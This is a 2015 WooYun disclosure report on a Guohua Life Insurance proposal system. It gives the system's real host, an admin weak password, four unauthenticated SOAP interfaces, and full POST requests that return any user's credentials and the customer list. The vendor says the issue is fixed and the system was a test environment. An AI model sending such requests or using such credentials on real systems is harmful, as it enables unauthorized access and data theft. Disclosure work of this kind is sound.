当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158414

漏洞标题:国华人寿某系统存在弱口令/接口未授权访问等漏洞

相关厂商:95549.cn

漏洞作者: 路人甲

提交时间:2015-12-05 23:22

修复时间:2015-12-07 10:09

公开时间:2015-12-07 10:09

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-05: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-07: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

弱口令、接口未授权访问等漏洞

详细说明:

系统地址:http://proposal.guohualife.com:8090/

QQ截图20151204222959.png


admin帐号存在弱口令12345678

QQ截图20151204222855.png


在系统里逛了一圈后发现了几个接口地址
1#http://proposal.guohualife.com:8091/proposalproxy/api/proposal/plan/planwebservice?WSDL
2#http://proposal.guohualife.com:8091/proposalproxy/api/proposal/query/querywebservice?WSDL
3#http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice?WSDL
4#http://proposal.guohualife.com:8091/proposalproxy/api/proposal/customer/customerwebservice?WSDL

漏洞证明:

http://proposal.guohualife.com:8091/proposalproxy/api/

QQ截图20151204223626.png


通过这几个未授权访问的接口,我们可以做到
获取任意用户帐号密码

POST http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Host: proposal.guohualife.com:8091
Content-Length: 417
Expect: 100-continue
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><getUserById xmlns="http://ws.system.proposalproxy.guohualife.com/"><arg0 xmlns="">&lt;Lsuser&gt;&lt;usercode&gt;admin&lt;/usercode&gt;&lt;/Lsuser&gt;</arg0></getUserById></soap:Body></soap:Envelope>


只需要替换usercode标签中的值即可

QQ截图20151204224644.png


POST http://proposal.guohualife.com:8091/proposalproxy/api/proposal/system/systemwebservice HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Host: proposal.guohualife.com:8091
Content-Length: 417
Expect: 100-continue
Connection: Keep-Alive
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><getUserById xmlns="http://ws.system.proposalproxy.guohualife.com/"><arg0 xmlns="">&lt;Lsuser&gt;&lt;usercode&gt;GD001&lt;/usercode&gt;&lt;/Lsuser&gt;</arg0></getUserById></soap:Body></soap:Envelope>


QQ截图20151204224813.png


比如这个请求

POST http://proposal.guohualife.com:8091/proposalproxy/api/proposal/customer/customerwebservice HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Host: proposal.guohualife.com:8091
Content-Length: 814
Expect: 100-continue
Connection: Keep-Alive
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><findCustomersByPage xmlns="http://ws.customer.proposalproxy.guohualife.com/"><arg0 xmlns="">&lt;PageQueryModel&gt;&lt;doCount&gt;true&lt;/doCount&gt;&lt;queryAll&gt;false&lt;/queryAll&gt;&lt;startPosition&gt;1&lt;/startPosition&gt;&lt;pageSize&gt;10&lt;/pageSize&gt;&lt;currentPage&gt;1&lt;/currentPage&gt;&lt;sortCol&gt;NAME&lt;/sortCol&gt;&lt;sortOrder&gt;DESC&lt;/sortOrder&gt;&lt;queryParam&gt;&lt;entry&gt;&lt;string&gt;operator&lt;/string&gt;&lt;string&gt;admin&lt;/string&gt;&lt;/entry&gt;&lt;/queryParam&gt;&lt;/PageQueryModel&gt;</arg0></findCustomersByPage></soap:Body></soap:Envelope>


我们可以获得该系统内的所有客户

QQ截图20151204225309.png

修复方案:

接口还是加个token吧,任意访问危害太大,甚至可以执行删除操作

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-07 10:04

厂商回复:

经核查,此为建议书测试环境,没有涉及到风险数据!

最新状态:

2015-12-07:没有任何机密数据,是测试环境

2015-12-07:此系统只是一个演示是系统,不会涉及机密数据;谢谢提示风险